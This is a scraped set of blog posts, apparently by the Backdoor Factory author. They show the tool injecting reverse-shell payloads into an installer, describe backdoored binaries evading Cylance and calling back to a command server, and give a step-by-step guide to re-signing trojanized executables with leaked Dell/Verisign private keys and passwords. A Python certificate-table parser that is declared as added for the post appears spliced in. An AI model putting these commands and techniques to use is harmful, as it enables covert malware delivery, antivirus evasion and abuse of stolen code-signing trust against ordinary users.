Anyway, this is how it looks when executing against an NSIS 3.0 binary with the NSIS preprocessor enabled:<br />
<br />
$ ./backdoor.py -f GIMP_Extensions_v2.8.20150403.exe -s iat_reverse_tcp_inline -P 8080 -H 127.0.0.1 -m automatic -p -q<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span> Backdoor Factory<br />
Author: Joshua Pitts<br />
Email: the.midnite.runr[-at ]gmail<d o-t>com<br />
Twitter: @midnite_runr<br />
IRC: freenode.net #BDFactory<br />
<br />
Version: 3.4.0<br />
<br />
[*] In the backdoor module<br />
[*] Checking if binary is supported<br />
[*] Gathering file info<br />
[*] Reading win32 entry instructions<br />
[*] Executing preprocessor: nsis_3_0<br />
[*] Running preprocessor nsis_3_0 against PE formats<br />
[*] Creating temp file: /var/folders/p8/l6qk3qcd69z234tpmylk8xhw0000gn/T/tmpaIO1Q4<br />
==================================================<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>NSIS 3.0 CRC32 Check | Patch Out Preprocessor<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>[*] NSIS 3.0 Binary loaded<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>[*] Patch location 0x2224<br />
==================================================<br />
[*] Checking if binary is supported<br />
[*] Gathering file info<br />
[*] Reading win32 entry instructions<br />
[*] Loading PE in pefile<br />
[*] Parsing data directories<br />
[*] Looking for and setting selected shellcode<br />
[*] Creating win32 resume execution stub<br />
[*] Looking for caves that will fit the minimum shellcode length of 42<br />
[*] All caves lengths: 145, 162, 42<br />
[*] Attempting PE File Automatic Patching<br />
[!] Selected: 2133: Section Name: .rsrc; Cave begin: 0x2bbcf End: 0x2bc75; Cave Size: 166; Payload Size: 162<br />
[!] Selected: 1990: Section Name: .rsrc; Cave begin: 0x164af End: 0x16555; Cave Size: 166; Payload Size: 145<br />
[!] Selected: 1998: Section Name: .rsrc; Cave begin: 0x169ff End: 0x16aa5; Cave Size: 166; Payload Size: 42<br />
[*] Changing flags for section: .rsrc<br />
[*] Patching initial entry instructions<br />
[*] Creating win32 resume execution stub<br />
[*] Looking for and setting selected shellcode<br />
[*] Saving TempFile to: tmpauO1Q4_GIMP_Extensions_v2.8.20150403.exe<br />
File GIMP_Extensions_v2.8.20150403.exe is in the 'backdoored' directory<br />
<br />
<br />
You'll see here that the temp file is saved and will be in the directory where you executed BDF from. However, because no modifications were made to the part of the binary that the CRC covers, you'll receive an error message if you attempt to execute that temp binary as-is (preprocessed, but not yet payload-patched). Note: this might fail on non-3.0 NSIS binaries, since the byte pattern the preprocessor searches for comes from the 3.0 stub.<br />
<br />
I also added a debug preprocessor, which is enabled by default. When reporting any issues with BDF I recommend including its output in the issue report.<br />
<br />
Example output: <br />
<br />
./backdoor.py -f GIMP_Extensions_v2.8.20150403.exe -q -p<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span> Backdoor Factory<br />
Author: Joshua Pitts<br />
Email: the.midnite.runr[-at ]gmail<d o-t>com<br />
Twitter: @midnite_runr<br />
IRC: freenode.net #BDFactory<br />
<br />
Version: 3.4.0<br />
<br />
[*] In the backdoor module<br />
[*] Checking if binary is supported<br />
[*] Gathering file info<br />
[*] Reading win32 entry instructions<br />
[*] Executing preprocessor: debug<br />
[*] Running preprocessor debug against ALL formats<br />
[*] Creating temp file: /var/folders/p8/l6qk3qcd69z234tpmylk8xhw0000gn/T/tmpVrZAv_<br />
==================================================<br />
************************* DEBUG INFO *************************<br />
XP_MODE : False<br />
SUFFIX : .old<br />
iat_cave_loc : 0<br />
SUPPORT_CHECK : False<br />
PATCH_DLL : True<br />
SUPPLIED_SHELLCODE : None<br />
FILE : GIMP_Extensions_v2.8.20150403.exe<br />
PATCH_METHOD : manual<br />
keep_temp : False<br />
CAVE_JUMPING : False<br />
PORT : None<br />
ORIGINAL_FILE : GIMP_Extensions_v2.8.20150403.exe<br />
CODE_SIGN : False<br />
DISK_OFFSET : 0<br />
SHELL : show<br />
CHANGE_ACCESS : True<br />
SHELL_LEN : 380<br />
NSECTION : sdata<br />
FIND_CAVES : False<br />
PREPROCESS : True<br />
DELETE_ORIGINAL : False<br />
binary : <closed file 'GIMP_Extensions_v2.8.20150403.exe', mode 'r+b' at 0x103428390><br />
IMAGE_TYPE : ALL<br />
SUPPLIED_BINARY : None<br />
HOST : None<br />
INJECTOR : False<br />
tmp_file : <open file '<fdopen>', mode 'w+b' at 0x1034285d0><br />
VERBOSE : False<br />
RUNAS_ADMIN : False<br />
ZERO_CERT : True<br />
OUTPUT : backdoored/GIMP_Extensions_v2.8.20150403.exe<br />
ADD_SECTION : False<br />
CAVE_MINER : False<br />
************************* BEGIN flItms *************************<br />
AddressOfEntryPoint: 0x323c<br />
Architecture: 0x0<br />
BaseOfCode: 0x1000<br />
BaseOfData: 0x7000<br />
BaseReLocationTable: 0x0<br />
BeginSections: 0x1d0<br />
BoundImport: 0x0<br />
BoundImportLOCinCode: 0x0<br />
BoundImportLocation: 0x1a8<br />
BoundImportSize: 0x0<br />
CLRRuntimeHeader: 0x0<br />
COFF_Start: 0xdc<br />
CertLOC: 0x0<br />
CertSize: 0x0<br />
CertTableLOC: 0x170<br />
Characteristics: 0x10f<br />
CheckSum: 0x0<br />
Debug: 0x0<br />
DelayImportDesc: 0x0<br />
DllCharacteristics: 0x8000<br />
ExceptionTable: 0x0<br />
ExportTableRVA: 0x0<br />
ExportTableSize: 0x0<br />
FileAlignment: 0x200<br />
GlobalPrt: 0x0<br />
IAT: 0x28c00007000<br />
IDT_IN_CAVE: False<br />
ImageBase: 0x400000<br />
ImpList: [[4207164, 'sub', 'esp, 0x180', 4207170, bytearray(b'\x81\xec\x80\x01\x00\x00'), 6]]<br />
ImportTableALL:<br />
ImportTableLOCInPEOptHdrs: 0x158<br />
ImportTableRVA: 0x73a4<br />
ImportTableSize: 0xb4<br />
JMPtoCodeAddress: 0x0<br />
LoadConfigTablePresent: False<br />
LoadConfigTableRVA: 0x0<br />
LoadConfigTableSize: 0x0<br />
LoaderFlags: 0x0<br />
LocOfEntryinCode: 0x263c<br />
LocOfEntryinCode_Offset: 0x0<br />
MachineType: 0x14c<br />
Magic: 0x10b<br />
MajorImageVersion: 0x6<br />
MajorLinkerVersion: 0x6<br />
MajorOperatingSystemVersion: 0x4<br />
MajorSubsystemVersion: 0x4<br />
MinorImageVersion: 0x0<br />
MinorLinkerVersion: 0x0<br />
MinorOperatingSystemVersion: 0x0<br />
MinorSubsystemVersion: 0x0<br />
NewIATLoc: 0x28<br />
NumberOfSections: 0x5<br />
NumberofRvaAndSizes: 0x10<br />
OptionalHeader_start: 0xf0<br />
PatchLocation: 0x323c<br />
Reserved: 0x0<br />
ResourceTable: 0x29be80003a000<br />
SectionAlignment: 0x1000<br />
--------------------------------------------------<br />
Section Name .text<br />
Virtual Size 0x5a5a<br />
Virtual Address 0x1000<br />
SizeOfRawData 0x5c00<br />
PointerToRawData 0x400<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0x60000020<br />
--------------------------------------------------<br />
Section Name .rdata<br />
Virtual Size 0x1190<br />
Virtual Address 0x7000<br />
SizeOfRawData 0x1200<br />
PointerToRawData 0x6000<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0x40000040<br />
--------------------------------------------------<br />
Section Name .data<br />
Virtual Size 0x1af98<br />
Virtual Address 0x9000<br />
SizeOfRawData 0x400<br />
PointerToRawData 0x7200<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0xc0000040<br />
--------------------------------------------------<br />
Section Name .ndata<br />
Virtual Size 0x16000<br />
Virtual Address 0x24000<br />
SizeOfRawData 0x0<br />
PointerToRawData 0x0<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0xc0000080<br />
--------------------------------------------------<br />
Section Name .rsrc<br />
Virtual Size 0x29be8<br />
Virtual Address 0x3a000<br />
SizeOfRawData 0x29c00<br />
PointerToRawData 0x7600<br />
PointerToRelocations 0x0<br />
PointerToLinenumbers 0x0<br />
NumberOfRelocations 0x0<br />
NumberOfLinenumbers 0x0<br />
SectionFlags 0x40000040<br />
--------------------------------------------------<br />
SizeOfCode: 0x5c00<br />
SizeOfHeaders: 0x400<br />
SizeOfHeapCommit: 0x1000<br />
SizeOfHeapReserve: 0x100000<br />
SizeOfImage: 0x64000<br />
SizeOfImageLoc: 0x128<br />
SizeOfInitializedData: 0x1d400<br />
SizeOfOptionalHeader: 0xe0<br />
SizeOfStackCommit: 0x1000<br />
SizeOfStackReserve: 0x100000<br />
SizeOfUninitializedData: 0x400<br />
Subsystem: 0x2<br />
TLS Table: 0x0<br />
TimeDateStamp: 0x4b1ae3c6<br />
VirtualAddress: 0x64000<br />
VrtStrtngPnt: 0x40323c<br />
Win32VersionValue: 0x0<br />
buffer: 0x0<br />
count_bytes: 0x6<br />
curdir: /Users/squirrel/the-backdoor-factory<br />
dis_frm_pehdrs_sectble: 0xf8<br />
filename: GIMP_Extensions_v2.8.20150403.exe<br />
pe_header_location: 0xd8<br />
rsrcPointerToRawData: 0x7600<br />
rsrcSectionName: .rsrc<br />
rsrcSizeRawData: 0x29c00<br />
rsrcVirtualAddress: 0x3a000<br />
rsrcVirtualSize: 0x29be8<br />
supported: True<br />
textPointerToRawData: 0x400<br />
textSectionName: .text<br />
textSizeRawData: 0x5c00<br />
textVirtualAddress: 0x1000<br />
textVirtualSize: 0x5a5a<br />
************************* END flItms *************************<br />
************************* END DEBUG INFO *************************<br />
==================================================<br />
The following WinIntelPE32s are available: (use -s)<br />
cave_miner_inline<br />
iat_reverse_tcp_inline<br />
iat_reverse_tcp_inline_threaded<br />
iat_reverse_tcp_stager_threaded<br />
iat_user_supplied_shellcode_threaded<br />
meterpreter_reverse_https_threaded<br />
reverse_shell_tcp_inline<br />
reverse_tcp_stager_threaded<br />
user_supplied_shellcode_threaded<br />
<br />
<br />
<br /></div>
midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com0tag:blogger.com,1999:blog-1658879437550643598.post-84561656666402145482016-05-11T13:48:00.003-07:002016-05-12T10:45:44.504-07:00A Glance at CylanceNote:<br />
<div>
- Personal thoughts here, employer not represented.</div>
<div>
- I don't like AVs. The risk to performance and security doesn't make sense to me.</div>
<div>
<br /></div>
<div>
I've worked at places where AV was <b>required</b> and the security team was tasked to help SysAdmins tune (troubleshoot) AV so that a zip file created by one employee and transferred to another did not cause an absolute system DoS (looks over at McAfee). And like most pentesters, I've been bypassing AVs for years.</div>
<div>
<br /></div>
<div>
I've heard a lot of hype around <a href="https://www.cylance.com/" target="_blank">Cylance</a> and its AI algorithm and machine learning, and I've been wanting to test it from an AppSec point of view and see whether I could bypass it using my open source tools. One cannot simply download a demo of Cylance and do testing as a household consumer. It is available only to enterprises, and I believe Blue Coat has adopted it as an inline scanner.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJtpgyAWFC1GeGqOXLby7zP7hcd8CHzd8TLA_lWt4aM8bC33ZH9RcHFs_jFts2aWLIt9BU7SnW0yKNRBzf_IpR_gggWcXxoi-Jg7N_c-P2DHkg-pGFusPGxGDfqvwXJOzbpchVUM3vb64/s1600/IMG_1513.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJtpgyAWFC1GeGqOXLby7zP7hcd8CHzd8TLA_lWt4aM8bC33ZH9RcHFs_jFts2aWLIt9BU7SnW0yKNRBzf_IpR_gggWcXxoi-Jg7N_c-P2DHkg-pGFusPGxGDfqvwXJOzbpchVUM3vb64/s320/IMG_1513.JPG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 13px;">The hype follows me on vacation</td></tr>
</tbody></table>
<div>
Via IRC, in #BDFactory on freenode, <a href="https://twitter.com/sizzop">Sizzop</a> mentioned that Cylance was doing a tour where you could bring in your own malware for testing. I thought why not. It was (still going as of posting) called their <a href="https://www.cylance.com/events-on-tour" target="_blank">Unbelievable Tour </a>and they had one close to me in DC. So I signed up.</div>
<div>
<br /></div>
<div>
The night before I set up a blind test using binaries from <a href="http://live.sysinternals.com/" target="_blank">live.sysinternals.com</a> and a command and control server on the public internet to catch call backs.</div>
<div>
<br /></div>
<div>
I downloaded the first level of tools in the directory and set up four folders on a USB drive:</div>
<div>
<ul>
<li>Set 1: Just Sysinternals tools with no modifications - approximately 100 binaries.</li>
<li>Set 2: Sysinternals again, with four binaries patched via <a href="https://github.com/secretsquirrel/the-backdoor-factory" target="_blank">BDF</a>, plus an <a href="https://github.com/Genetic-Malware/Ebowla" target="_blank">Ebowla</a> Go-compiled binary carrying <a href="https://github.com/n1nj4sec/pupy" target="_blank">Pupy</a> as payload and keyed to run in May 2016 (it was still April 2016), a Veil Python-compiled binary, a sandbox fingerprinter (PyInstaller-compiled Python), and a backdoored Mach-O binary; nothing modified or custom was signed.</li>
<li>Set 3: Sysinternals with four BDF-patched binaries (signed with an expired cert), plus an Ebowla Go-compiled binary with Pupy as a payload keyed to execute in April 2016 only (it was April 28th).</li>
<li>Set 4: Various malformed PE files known (to me) to cause issues in PE file parsers.</li>
</ul>
</div>
<div>
With my USB drive burning a hole in my pocket, I arrived at the demo location - Morton's in DC (swanky). Everyone from Cylance was friendly. The demo was presented with lunch.</div>
<div>
<br /></div>
<div>
Cylance sales engineers talked about how they use AI to determine what is bad and that they have done away with dat files. The agent and all supporting files were a total of ~60 MB. Then, Cylance pitted itself against Symantec in a demo; they took about 100 known malicious samples, ran them through VMprotect and dropped all the pre and post VMprotect samples on two Windows 7 virtual machines (VMs) - one with Cylance and one with Symantec.</div>
<div>
<br /></div>
<div>
Cylance detected everything. I expected as much, since they were running the demo. Symantec detected nothing (at all) and the VM became non-functional. </div>
<div>
<br /></div>
<div>
My initial impressions:</div>
<div>
<ul>
<li>The Cylance agent was really fast.</li>
<li>There seemed no impact on performance of the Cylance VM.</li>
<li>I was impressed and worried about my tests. After all, BDF has been open source for three years.</li>
</ul>
</div>
<div>
After the sales presentation and demo, they offered to run malware from the audience. There were two of us that had samples for testing.</div>
<div>
<br /></div>
<div>
I went first and the results were as follows:</div>
<div>
<ul>
<li>Set 1: Some of the Sysinternals tools were flagged, PsExec for example and I think a couple more. I did not have control of the computer to determine exactly which. One thing to watch when deploying an AV is its false positive rate; Cylance is not immune to this.</li>
<li>Set 2: The Veil payload was caught and quarantined prior to execution. One BDF payload was caught and quarantined prior to execution - it used a payload straight from Metasploit. Nothing else was flagged. On physical execution, the remaining binaries connected to my command and control server.</li>
<li>Set 3: One BDF sample was flagged and quarantined. Interestingly, it was a sample that I did not want caught; however, I picked the patching method myself - the code cave selection. All the BDF auto-generated samples with my IAT based payloads were not flagged. Remember these samples had bad certificates. Nothing else was flagged. On physical execution, the remaining binaries connected to my command and control server. Cylance does not scan cross-platform executables, so my Mach-O (OS X) backdoored binary was not scanned.</li>
<li>The sales engineer fired up a GUI control panel to scan the malformed exes. Not all of them were recognized as valid PE files (expected) and I did not see any crashes, though the sample size was small, fewer than 20 items.</li>
</ul>
<br />
Summary:</div>
<div>
<ul>
<li>Veil 1/1 detected</li>
<li>BDF binaries that should have been detected (metasploit shellcode): 1/1</li>
<li>BDF binaries I did not want detected: 1/7</li>
<li>Ebowla: 0/2 detected</li>
<li>Pyinstaller sandbox enumerator: 0/1 detected (does nothing bad really)</li>
</ul>
<br />
The other group had a JScript Encoded (.jse) file. Cylance has a script blocker of sorts that stopped execution of the file. I believe this works against PowerShell scripts also, but I was not prepared to test it.</div>
<div>
<br /></div>
<div>
My thoughts after testing:</div>
<div>
<ul>
<li>It was really fast. I can't say this enough.</li>
<li>With all the AI processing on the backend to make the rules for the deployed agent, the Cylance agent still has to make a determination on what is good/bad. Everything still comes down to a single if statement - let this run or don't.</li>
<li>It's still an AV. It has a kernel driver to hook binary execution. This adds an attack footprint just like any other AV. However, because it doesn't work with dat files, I think that the attack footprint is potentially smaller than other AVs. The agent still has to worry about file format parsing. I would like to do an appsec style analysis of the entire deployed platform.</li>
<li>Updates. They were stating that Cylance only updates once or twice a year as a positive. I'd imagine that they will flag BDF output in the next update. However, if there is a major outbreak of a specific type of infection that the agent does not believe is bad now, how will the agent determine if it is bad in the future? If updating the agent entirely is the only way to add new detection algorithms, then I see more frequent updates and perhaps agent bloat. </li>
<li>No comparisons against F-Secure or Kaspersky? I think Cylance's main target for competition is the US market - where McAfee and Symantec have dominance.</li>
</ul>
</div>
<div>
If your organization is in an industry where AV is required for compliance reasons <b>AND</b> it has to be from the US (you are stuck with McAfee or Symantec), I would give Cylance a demo and compare it to what you have now.</div>
<div>
<br /></div>
<div>
Update:<br />
FULL DISCLOSURE: I won a gift card for bypassing Cylance.</div>
midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com12tag:blogger.com,1999:blog-1658879437550643598.post-72809479173773666102015-12-16T20:31:00.000-08:002015-12-16T20:31:34.884-08:00Add PE Code Signing to Backdoor Factory (BDF)Let's say you want to add PE code signing to your instance of BDF after you patch PE files. It's really easy. But to be honest, it's something I will not officially support in BDF for various reasons at the moment. One of them - I don't want to ship signing certs with BDF. Perhaps I'll release a pro version where I implement everything or I'll teach a class and include stuff like this. Or I'll just tell you below.<br />
<br />
Why would you want code signing in BDF?<br />
<br />
Internet browsers like IE/Edge give a pass to a binary that is signed (A/V is another story). So if a signed binary delivered via http is MITM'ed, unsigned, patched, and then re-signed with a valid cert, a browser like IE should be fine with it. Since BDF is part of BDFProxy, even better, right?<br />
<br />
Cool, ready to add code signing to BDF?<br />
<br />
First things first, you need some signing certs.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxN8n-1K_jGM2V5hLm61PGs1hYcfIQBZrfWGdxErUE_kKTUWJ-sLufTNBWJ3ORlHEVw55JaPXLyZgDt1NHjoVRYMJ5cEwTTU75Zt9XU1aj2JiGxg3UZqHhobP4RPq40IRrhHJ9HLzIuUc/s1600/vwnsh.jpg" imageanchor="1"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxN8n-1K_jGM2V5hLm61PGs1hYcfIQBZrfWGdxErUE_kKTUWJ-sLufTNBWJ3ORlHEVw55JaPXLyZgDt1NHjoVRYMJ5cEwTTU75Zt9XU1aj2JiGxg3UZqHhobP4RPq40IRrhHJ9HLzIuUc/s400/vwnsh.jpg" width="400" /></a><br />
<br />
<br />
The kind folks at Duo Security did some great research, read it <a href="https://www.duosecurity.com/static/pdf/Dude,_You_Got_Dell_d.pdf">here</a>.<br />
<br />
Grab the certs <a href="https://www.duosecurity.com/static/files/DellCertificates.zip">here</a>.<br />
<br />
Now BDF runs great on *nix/OSX, so we need something that does PE code signing on linux.<br />
<br />
Grab <a href="http://sourceforge.net/projects/osslsigncode/">osslsigncode</a> as so:<br />
<br />
$ git clone git://git.code.sf.net/p/osslsigncode/osslsigncode osslsigncode<br />
<br />
To build:<br />
<br />
$ ./autogen.sh<br />
$ ./configure<br />
$ make<br />
$ sudo make install<br />
<br />
Next we need the signing certs and we need to put them in the BDF directory.<br />
<br />
Navigate to your BDF home directory.<br />
<br />
the-backdoor-factory git:(master) $<br />
$ curl -O https://www.duosecurity.com/static/files/DellCertificates.zip<br />
$ mkdir certs<br />
$ unzip DellCertificates.zip -d certs<br />
<br />
$ tree certs<br />
certs<br />
├── Verisign.pass<br />
├── Verisign.pfx<br />
├── __MACOSX<br />
├── eDellRoot.cer<br />
└── eDellRootLocalhost.cer<br />
<br />
Let's use the verisign cert.<br />
<br />
We'll need to convert the pfx format to cer/pem as that is what osslsigncode prefers. Use -nokeys so the .cer holds only the certificate chain; the private key gets its own file in the next step.<br />
<br />
$ openssl pkcs12 -in certs/Verisign.pfx -out certs/Verisign.cer -nokeys<br />
Enter Import Password: t-span<br />
<br />
OK.<br />
<br />
Now we need to make a private key.<br />
<br />
$ openssl pkcs12 -in certs/Verisign.pfx -nocerts -out certs/VerisignPrivateKey.pem <br />
Enter Import Password: t-span<br />
MAC verified OK<br />
Enter PEM pass phrase: moomoo<br />
Verifying - Enter PEM pass phrase: moomoo<br />
<br />
Let's test everything out:<br />
<br />
$ curl -O http://live.sysinternals.com/tcpview.exe # yay http<br />
<br />
$ osslsigncode extract-signature -in tcpview.exe -out sig.txt<br />
<br />
$ hexdump -C sig.txt<br />
<br />
And you should see something like this: http://pastebin.com/My9UHyjS<br />
Clearly from Microsoft!<br />
<br />
Test run:<br />
<br />
$ osslsigncode -certs certs/Verisign.cer -key certs/VerisignPrivateKey.pem -n "Securitay" -in tcpview.exe -out tcpview_signed.exe -pass moomoo<br />
Succeeded<br />
<br />
$ osslsigncode extract-signature -in tcpview_signed.exe -out sig1.txt<br />
<br />
$ hexdump -C sig1.txt<br />
<br />
And you should see something like this: http://pastebin.com/BSEzgS5q<br />
Clearly not from Microsoft!<br />
<br />
And if you upload to VirusTotal you'll see the signature is fully signed in the 'Signers' section and not by MS: https://www.virustotal.com/en/file/65b06e906b17c9f164937826575fc45f4c5f152ef8abfc324368eb46bb0028dc/analysis/1450316795/<br />
<br />
Your certs directory should now look as so:<br />
$ tree certs<br />
certs<br />
├── Verisign.cer<br />
├── Verisign.pass<br />
├── Verisign.pfx<br />
├── VerisignPrivateKey.pem<br />
├── __MACOSX<br />
├── eDellRoot.cer<br />
└── eDellRootLocalhost.cer<br />
<br />
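Before wiring signing into BDF it helps to see exactly what osslsigncode extract-signature and BDF's ZERO_CERT step touch: the Security entry (index 4) of the optional header's data directory, which unlike every other directory entry holds a raw file offset rather than an RVA, and the WIN_CERTIFICATE blob it points to. The script below is an added example written for this post, not code from BDF or from osslsigncode. It locates that entry, pulls out the PKCS#7 payload, and clears the entry the way BDF's "Overwriting certificate table pointer" step does before patching. Its only input is a constructed, headers-only PE32/PE32+ image from build_sample_pe(); the offsets are the PE spec's, and the same arithmetic yields the CertTableLOC 0x170 that the BDF debug dump earlier on this page reports for pe_header_location 0xd8.<br />

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4          # data directory index of the Attribute Certificate Table
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0200, 0x0002


def security_directory_entry_offset(pe):
    """File offset of the 8-byte (VirtualAddress, Size) pair for the certificate table.
    Same arithmetic as BDF's CertTableLOC: e_lfanew + 4 + 20 + 96 (112 for PE32+) + 8 * 4."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    optional_header = e_lfanew + 4 + 20                 # IMAGE_FILE_HEADER is 20 bytes
    magic = struct.unpack_from("<H", pe, optional_header)[0]
    if magic == PE32_MAGIC:
        data_directories = optional_header + 96
    elif magic == PE32PLUS_MAGIC:
        data_directories = optional_header + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    number_of_rva_and_sizes = struct.unpack_from("<I", pe, data_directories - 4)[0]
    if number_of_rva_and_sizes <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        raise ValueError("optional header carries no security directory")
    return data_directories + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY


def security_directory(pe):
    """(file offset, size) of the certificate table; (0, 0) means the file is unsigned."""
    return struct.unpack_from("<II", pe, security_directory_entry_offset(pe))


def extract_signature(pe):
    """Return (wRevision, wCertificateType, bCertificate) from the WIN_CERTIFICATE blob,
    or None for an unsigned file. bCertificate is the PKCS#7 SignedData that
    `osslsigncode extract-signature` writes out."""
    offset, size = security_directory(pe)
    if offset == 0 or size == 0:
        return None
    if offset + size > len(pe):
        raise ValueError("certificate table points outside the file")
    length, revision, cert_type = struct.unpack_from("<IHH", pe, offset)
    if length < 8 or length > size:
        raise ValueError("WIN_CERTIFICATE dwLength is inconsistent with the directory size")
    return revision, cert_type, pe[offset + 8:offset + length]


def zero_certificate_table(pe):
    """Clear the directory entry so any parser sees an unsigned file (what BDF's
    ZERO_CERT does), and drop the orphaned blob when it sits at the end of the
    image. Dropping the blob is this example's choice; the page does not show
    how BDF itself treats the bytes."""
    offset, size = security_directory(pe)
    out = bytearray(pe)
    struct.pack_into("<II", out, security_directory_entry_offset(pe), 0, 0)
    if offset and offset + size == len(out):
        del out[offset:]
    return bytes(out)


def build_sample_pe(pkcs7=None, plus=False):
    """Constructed headers-only PE image for the demo: DOS header, PE signature,
    file header, optional header with 16 data directories, no sections. If pkcs7
    is given, a WIN_CERTIFICATE wrapping it is appended and pointed to."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xF0 if plus else 0xE0
    file_header = struct.pack("<HHIIIHH", 0x8664 if plus else 0x14C, 0, 0, 0, 0, opt_size, 0x0102)
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, PE32PLUS_MAGIC if plus else PE32_MAGIC)
    struct.pack_into("<I", optional, 108 if plus else 92, 16)   # NumberOfRvaAndSizes
    pe = bytes(dos) + b"PE\0\0" + file_header + bytes(optional)
    if pkcs7 is None:
        return pe
    pe += b"\0" * (-len(pe) % 8)                                # table must start 8-byte aligned
    cert = struct.pack("<IHH", 8 + len(pkcs7), WIN_CERT_REVISION_2_0,
                       WIN_CERT_TYPE_PKCS_SIGNED_DATA) + pkcs7
    cert += b"\0" * (-len(cert) % 8)                            # entries are padded to 8 bytes
    out = bytearray(pe + cert)
    struct.pack_into("<II", out, security_directory_entry_offset(out), len(pe), len(cert))
    return bytes(out)


if __name__ == "__main__":
    sample = build_sample_pe(b"constructed-pkcs7")
    print("entry at 0x%x, table %r" % (security_directory_entry_offset(sample), security_directory(sample)))
    print("signature:", extract_signature(sample))
    print("after zeroing:", security_directory(zero_certificate_table(sample)))
```

On a real file, read it with open(path, "rb").read() and run the same three functions; confirming security_directory() returns (0, 0) right after BDF's ZERO_CERT step is the check to make before handing the file to osslsigncode. The Authenticode hash excludes the CheckSum field, this directory entry and the blob itself, which is why the old signature can simply be cut off and a new one appended after patching instead of having to fit inside the original image.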
Time to modify BDF source code!!<br />
<br />
<div style="font-family: Helvetica; font-size: 12px; line-height: normal;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8uQxSZSg1j5bmc3LeSKqlvY4P_vPuO7-yTVQvS7dszgCNyZy9-FaE0_6eFARZXqkUiNhy-7dN772BZzGXvZw31JzBcbLtwWiUfNJpV_XpqIQXKzwViZdHTLzgbT0bb3j1_Y6V40Xersw/s1600/its_happening.gif" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8uQxSZSg1j5bmc3LeSKqlvY4P_vPuO7-yTVQvS7dszgCNyZy9-FaE0_6eFARZXqkUiNhy-7dN772BZzGXvZw31JzBcbLtwWiUfNJpV_XpqIQXKzwViZdHTLzgbT0bb3j1_Y6V40Xersw/s400/its_happening.gif" /></a></div>
<br />
Open pebin.py in your favorite editor.<br />
<br />
Navigate to the bottom of the "def patch_pe(self):" function.<br />
<br />
Near the bottom of that function we will modify...<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjncwxBRL2M5RgM9TaFQ8c8HUxNzLgyhhOfJ7vJLMe1epAQn-5_fpqn7nzn_wjB98O5tM2HnKr72VwJPObBvTS1BhLKIS25BY69MWqhqGGJwqmQrjSMLcL8c-y3InBQeSY8fNtpeszBPSo/s1600/BDF_signing.png" imageanchor="1"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjncwxBRL2M5RgM9TaFQ8c8HUxNzLgyhhOfJ7vJLMe1epAQn-5_fpqn7nzn_wjB98O5tM2HnKr72VwJPObBvTS1BhLKIS25BY69MWqhqGGJwqmQrjSMLcL8c-y3InBQeSY8fNtpeszBPSo/s640/BDF_signing.png" width="640" /></a><br />
<br />
...with the following code...<br />
<br />
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
if self.ZERO_CERT is True:</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
# cert was removed earlier </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
p = subprocess.Popen(['osslsigncode', '-certs', 'certs/Verisign.cer', '-key', \</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
'certs/VerisignPrivateKey.pem', '-n', 'Security','-in', \</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
self.flItms["backdoorfile"], '-out', self.flItms["backdoorfile"], '-pass', 'moomoo'])</div>
<br />
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
p.wait()</div>
<div>
<br /></div>
<div>
... so it looks like this afterwards:</div>
<div>
<br /></div>
<div>
